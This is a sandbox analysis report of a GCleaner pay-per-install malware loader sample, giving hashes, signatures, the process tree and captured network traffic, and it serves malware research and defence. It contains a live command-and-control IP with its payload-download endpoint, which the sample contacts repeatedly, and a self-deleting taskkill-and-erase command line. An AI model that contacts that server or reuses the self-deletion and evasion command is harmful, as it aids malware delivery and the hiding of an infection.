Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

cryptolaemus

windows10-2004-x64

10

cryptolaemus

windows11-21h2-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/09/2024, 00:17 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe

  • Size

    295KB

  • MD5

    f82c9413e07313056c13db265b4ff06d

  • SHA1

    80c856b004083ebe777a7c4030d247d26cd7dc40

  • SHA256

    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e

  • SHA512

    3accbff6cc6f3fd95a14a687920aad9053fdcf01bebc911b975fa5b718b685bb88cc5a7efcb05ab7b7f7e74d358d0728ecc0478ddc5b5d8b1455619e6c8eb921

  • SSDEEP

    6144:U6VyfXc9rZniLw7BUDJ5/kDQwgxAu/w/Q:U9XurZniemXwgxAuY/

Score
10/10
gcleanerdiscoveryloader

Malware Config

Extracted

Family

gcleaner

C2

80.66.75.114

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    "C:\Users\Admin\AppData\Local\Temp\c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe" & exit
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im "c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1688

Network

  • flag-ru
    GET
    http://80.66.75.114/add?substr=one&s=two
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /add?substr=one&s=two HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:15 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:16 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:18 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:20 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:23 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=96
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:25 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:27 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=94
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:29 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=93
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:31 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=92
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:33 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=91
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:35 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=90
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-ru
    GET
    http://80.66.75.114/files/download
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    Remote address:
    80.66.75.114:80
    Request
    GET /files/download HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 80.66.75.114
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 08 Sep 2024 00:17:37 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=89
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    114.75.66.80.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.75.66.80.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    nexusrules.officeapps.live.com
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.229.19
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    self.events.data.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    self.events.data.microsoft.com
    IN A
    Response
    self.events.data.microsoft.com
    IN CNAME
    self-events-data.trafficmanager.net
    self-events-data.trafficmanager.net
    IN CNAME
    onedscolprdwus20.westus.cloudapp.azure.com
    onedscolprdwus20.westus.cloudapp.azure.com
    IN A
    20.189.173.25
  • flag-us
    DNS
    25.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 80.66.75.114:80
    http://80.66.75.114/files/download
    http
    c0da3ea4d016ecf84a11d0b73c7b1cdcfef31391cf58c6591cd927acae83372e.exe
    6.8kB
     3.3kB
     29
    21

    HTTP Request

    GET http://80.66.75.114/add?substr=one&s=two

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200

    HTTP Request

    GET http://80.66.75.114/files/download

    HTTP Response

    200
  • 8.8.8.8:53
    114.75.66.80.in-addr.arpa
    dns
    433 B
     870 B
     6
    6

    DNS Request

    114.75.66.80.in-addr.arpa

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.229.19

    DNS Request

    19.229.111.52.in-addr.arpa

    DNS Request

    self.events.data.microsoft.com

    DNS Response

    20.189.173.25

    DNS Request

    25.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I323E2ZQ\download[1].htm
    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

    Download Submit

  • memory/1996-1-0x0000000002D00000-0x0000000002E00000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1996-2-0x00000000049B0000-0x00000000049DD000-memory.dmp

    Filesize

    180KB

    Download

  • memory/1996-3-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/1996-8-0x0000000002D00000-0x0000000002E00000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1996-11-0x00000000049B0000-0x00000000049DD000-memory.dmp

    Filesize

    180KB

    Download

  • memory/1996-10-0x0000000000400000-0x0000000002B6A000-memory.dmp

    Filesize

    39.4MB

    Download

  • memory/1996-13-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/1996-22-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/1996-21-0x0000000000400000-0x0000000002B6A000-memory.dmp

    Filesize

    39.4MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.